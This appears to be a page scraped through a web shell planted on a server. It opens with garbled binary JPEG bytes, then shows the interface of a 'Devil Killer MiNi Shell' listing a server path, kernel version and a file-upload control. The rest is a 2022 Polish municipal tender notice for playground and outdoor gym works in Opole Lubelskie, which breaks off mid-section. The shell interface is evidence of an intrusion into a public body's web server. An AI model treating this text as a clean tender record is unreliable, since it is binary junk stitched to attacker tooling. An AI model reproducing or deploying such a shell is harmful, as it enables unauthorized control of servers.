JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220906/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220906/0033545201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa i modernizacja placów zabaw oraz budowa siłowni zewnętrznej <br/>na terenie Opola Lubelskiego” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA OPOLE LUBELSKIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431020026</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lubelska 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole Lubelskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">24-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0818277201</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">0818277200</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@opolelubelskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://opolelubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa i modernizacja placów zabaw oraz budowa siłowni zewnętrznej <br/>na terenie Opola Lubelskiego” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a68e9434-2914-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00335452</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00010583/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 „Przebudowa i modernizacja placów zabaw oraz budowa siłowni zewnętrznej na terenie Opola Lubelskiego”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> pzp.opolelubelskie.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">pzp.opolelubelskie.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej: (1) Platformy Zamówień Publicznych ZETOPZP: https://pzp.opolelubelskie.pl/, poczty elektronicznej: sekretariat@opolelubelskie.pl- którą należy traktować wyłącznie jako tzw. „awaryjną”, w przypadku problemów technicznych,</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Opole Lubelskie z siedzibą przy ul. Lubelskiej 4, 24-300 Opole Lubelskie, email sekretariat@opolelubelskie.pl<br/>2) Adres e–mail inspektora ochrony danych osobowych w Gminie Opole Lubelskie iod@opolelubelskie.pl, tel.: 22 350 01 40<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. cRODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2018 r. poz. 1986 z póź. zm.), dalej „ustawa Pzp”;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/> na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/> na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/> na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/> prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/> nie przysługuje Pani/Panu:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IPR.271.17.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres zamówienia obejmuje między innymi:<br/>1)	CZĘŚĆ I: Przebudowa placu zabaw oraz budowa siłowni zewnętrznej przy ulicy Długiej w Opolu Lubelskim. W zakres zamówienia wchodzi: <br/>a)	rozbiórka wyeksploatowanych istniejących urządzeń i ogrodzenia placu zabaw. Zdemontowane urządzenia należy przekazać Zamawiającemu, na wskazane przez niego miejsce,<br/>b)	budowa niżej wymienionych urządzeń na placu zabaw,<br/>	zjeżdżalnia wolnostojąca<br/>	sześciokąt z pajęczyną,<br/>	huśtawka ważka,<br/>	huśtawka potrójna,<br/>	huśtawka bocianie gniazdo,<br/>	karuzela krzyżowa,<br/>	sprężynowiec słoń,<br/>	remont istniejącego na placu zabaw zestawu oznaczonego 08,<br/>c)	budowa urządzeń siłowni plenerowej:<br/>	biegacz,<br/>	twister,<br/>	orbitrek,<br/>	wioślarz,<br/>	podciągacz,<br/>	wypychacz,<br/>d)	budowa ogrodzenia,<br/>e)	budowa nawierzchni placu zabaw,<br/>f)	budowa dojść<br/>g)	wykonanie elementów uzupełniających,<br/>h)	urządzenie i odtworzenie zieleni na działce po wykonaniu robót<br/>i)	Wykonawca zapewnia obsługę geodezyjną oraz inwentaryzację geodezyjną;<br/>4.	Wykonawca winien zapewnić kierownika budowy/robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45220000-5 - Roboty inżynieryjne i budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W odniesieniu do wykonawców, którzy spełnili warunki udziału w postępowaniu, komisja dokona oceny ofert na podstawie następujących kryteriów:<br/><br/>Lp.	Nazwa kryterium	Symbol	Waga<br/> [%]<br/><br/>1)	Cena oferty	C	60<br/>2)	Okres gwarancji	G	40<br/>RAZEM:	100<br/><br/>1)	Kryterium: cena oferty C<br/>Ocena ofert w zakresie kryterium: cena oferty zostanie dokonana w/g następującej zasady:<br/>- cena oferty: waga 60% <br/>Maksymalna ilość punktów, która może zostać przyznana Wykonawcy w kryterium cena oferty: 60 punktów. <br/>Do oceny kryterium „cena oferty” będzie brana pod uwagę cena brutto (całkowita cena za wykonanie zamówienia) zaoferowana przez wykonawcę w Formularzu Ofertowym Wykonawcy (załącznik nr 1 do SWZ), czyli zawierająca należny podatek od towarów i usług (VAT).<br/>Oferta wypełniająca w najwyższym stopniu wymagania określonego kryterium, otrzyma maksymalną ilość punktów, czyli 60. Najwyższą liczbę punktów 60 otrzyma oferta, która zawiera najniższą cenę.<br/>Pozostałym wykonawcom, spełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza liczba punktów, obliczona wg poniższego wzoru, zastosowanego do obliczania punktowego.<br/><br/>Wzór do obliczeń:<br/>	Cn<br/>	------ x 60 pkt = liczba punktów C<br/>	Cx<br/>gdzie: Cn – najniższa cena spośród wszystkich proponowanych przez wykonawców <br/>	Cx – cena przedstawiona przez badanego wykonawcę<br/> 60 pkt - procentowe znaczenie kryterium: ceny oferty (waga: 60%). „<br/>2)	Kryterium: Okres Gwarancji G<br/>(w przedziale od 0 do 40 punktów)<br/>Wykonawca może zaoferować okres gwarancji wynoszący 48 m-cy (minimalny wymagany okres) lub 60 m-cy i więcej.<br/><br/>Punkty przyznaje się na poniższych zasadach:<br/>0 punktów - okres gwarancji wynoszący 48 m-cy; w przypadku nie wypełnienia stosownego pola na druku formularza oferty oraz w przypadku zaoferowania dłuższego niż 48 m-cy a krótszego niż 60 m-cy okresu gwarancji;<br/>40 punktów - okres gwarancji wynoszący 60 m-cy i więcej<br/><br/>- w przypadku nie wypełnienia stosownego pola na druku formularza oferty Wykonawca otrzyma 0 punktów. <br/>- w przypadku zaoferowania przez Wykonawcę krótszego okresu gwarancji niż 48 m-cy Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp. <br/>- w przypadku zaoferowania dłuższego niż 48 m-cy a krótszego niż 60 m-cy okresu gwarancji Wykonawca otrzyma 0 punktów<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów (Sp), będącą sumą punktów przyznanych w poszczególnych kryteriach, obliczona wg poniższego wzoru:<br/><br/>Wzór do obliczeń:<br/><br/>Sp = C + G<br/><br/>gdzie:	Sp –	Suma punktów przyznana wykonawcy w kryteriach: cena oferty, okres gwarancji, <br/>	C –	ilość punktów przyznana w kryterium: cena oferty<br/>	G- ilość punktów przyznana w kryterium: okres gwarancji<br/>Sposób oceny: z porównania otrzymanych wyników.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska w sumie najwyższą liczbę punktów przyznaną w w /w kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2)	Część II: Modernizacja placu zabaw przy Przedszkolu Miejskim w Opolu<br/>Lubelskim. W zakres zamówienia wchodzi: <br/>a)	Przebudowa placu zabaw będzie polegała na demontażu wszystkich istniejących urządzeń, nawierzchni bezpiecznej oraz montaż nowych urządzeń zabawowych na terenie biologicznie czynnym (trawie).<br/>b)	Wykonawca ma obowiązek dokonać demontażu urządzeń istniejącego placu zabaw i przekazać Zamawiającemu. <br/>c)	Na działkach nr 609, 610, projektuje się montaż n/w urządzeń:<br/>	Zestaw zabawowy mały nr 1,<br/>	Zestaw zabawowy duży nr 2,<br/>	Urządzenie muzyczne,<br/>	Huśtawka pojedyncza – bocianie gniazdo,<br/>	Domek - 2 szt.,<br/>	Huśtawka podwójna – ( 2 x siedzisko płaskie, 2x koszykowe),<br/>	Bujak – 6 szt., (np. samochodzik, delfinek, koparka, konik, rekin, żaba itp.),<br/>	Ławka z oparciem (3 szt.),<br/>	Stoliki z ławeczkami z płyt HDPE (4 szt.),<br/>	Śmietnik (4 pojemniki w kształcie zwierzątek),<br/>	Nawierzchnia bezpieczna z krat przerostowych,<br/>	Wykonanie ławeczek z listew drewnianych świerkowych na istniejącej piaskownicy.<br/>d)	Wykonawca zapewnia obsługę geodezyjną przebudowy placu zabaw oraz inwentaryzację geodezyjną. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45220000-5 - Roboty inżynieryjne i budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45212200-8 - Roboty budowlane w zakresie budowy obiektów sportowych</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">8 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W odniesieniu do wykonawców, którzy spełnili warunki udziału w postępowaniu, komisja dokona oceny ofert na podstawie następujących kryteriów:<br/><br/>Lp.	Nazwa kryterium	Symbol	Waga<br/> [%]<br/><br/>1)	Cena oferty	C	60<br/>2)	Okres gwarancji	G	40<br/>RAZEM:	100<br/><br/>1)	Kryterium: cena oferty C<br/>Ocena ofert w zakresie kryterium: cena oferty zostanie dokonana w/g następującej zasady:<br/>- cena oferty: waga 60% <br/>Maksymalna ilość punktów, która może zostać przyznana Wykonawcy w kryterium cena oferty: 60 punktów. <br/>Do oceny kryterium „cena oferty” będzie brana pod uwagę cena brutto (całkowita cena za wykonanie zamówienia) zaoferowana przez wykonawcę w Formularzu Ofertowym Wykonawcy (załącznik nr 1 do SWZ), czyli zawierająca należny podatek od towarów i usług (VAT).<br/>Oferta wypełniająca w najwyższym stopniu wymagania określonego kryterium, otrzyma maksymalną ilość punktów, czyli 60. Najwyższą liczbę punktów 60 otrzyma oferta, która zawiera najniższą cenę.<br/>Pozostałym wykonawcom, spełniającym wymagania kryterialne przypisana zostanie odpowiednio mniejsza liczba punktów, obliczona wg poniższego wzoru, zastosowanego do obliczania punktowego.<br/><br/>Wzór do obliczeń:<br/>	Cn<br/>	------ x 60 pkt = liczba punktów C<br/>	Cx<br/>gdzie: Cn – najniższa cena spośród wszystkich proponowanych przez wykonawców <br/>	Cx – cena przedstawiona przez badanego wykonawcę<br/> 60 pkt - procentowe znaczenie kryterium: ceny oferty (waga: 60%). „<br/>2)	Kryterium: Okres Gwarancji G<br/>(w przedziale od 0 do 40 punktów)<br/>Wykonawca może zaoferować okres gwarancji wynoszący 48 m-cy (minimalny wymagany okres) lub 60 m-cy i więcej.<br/><br/>Punkty przyznaje się na poniższych zasadach:<br/>0 punktów - okres gwarancji wynoszący 48 m-cy; w przypadku nie wypełnienia stosownego pola na druku formularza oferty oraz w przypadku zaoferowania dłuższego niż 48 m-cy a krótszego niż 60 m-cy okresu gwarancji;<br/>40 punktów - okres gwarancji wynoszący 60 m-cy i więcej<br/><br/>- w przypadku nie wypełnienia stosownego pola na druku formularza oferty Wykonawca otrzyma 0 punktów. <br/>- w przypadku zaoferowania przez Wykonawcę krótszego okresu gwarancji niż 48 m-cy Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp. <br/>- w przypadku zaoferowania dłuższego niż 48 m-cy a krótszego niż 60 m-cy okresu gwarancji Wykonawca otrzyma 0 punktów<br/><br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów (Sp), będącą sumą punktów przyznanych w poszczególnych kryteriach, obliczona wg poniższego wzoru:<br/><br/>Wzór do obliczeń:<br/><br/>Sp = C + G<br/><br/>gdzie:	Sp –	Suma punktów przyznana wykonawcy w kryteriach: cena oferty, okres gwarancji, <br/>	C –	ilość punktów przyznana w kryterium: cena oferty<br/>	G- ilość punktów przyznana w kryterium: okres gwarancji<br/>Sposób oceny: z porównania otrzymanych wyników.<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska w sumie najwyższą liczbę punktów przyznaną w w /w kryteriach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne 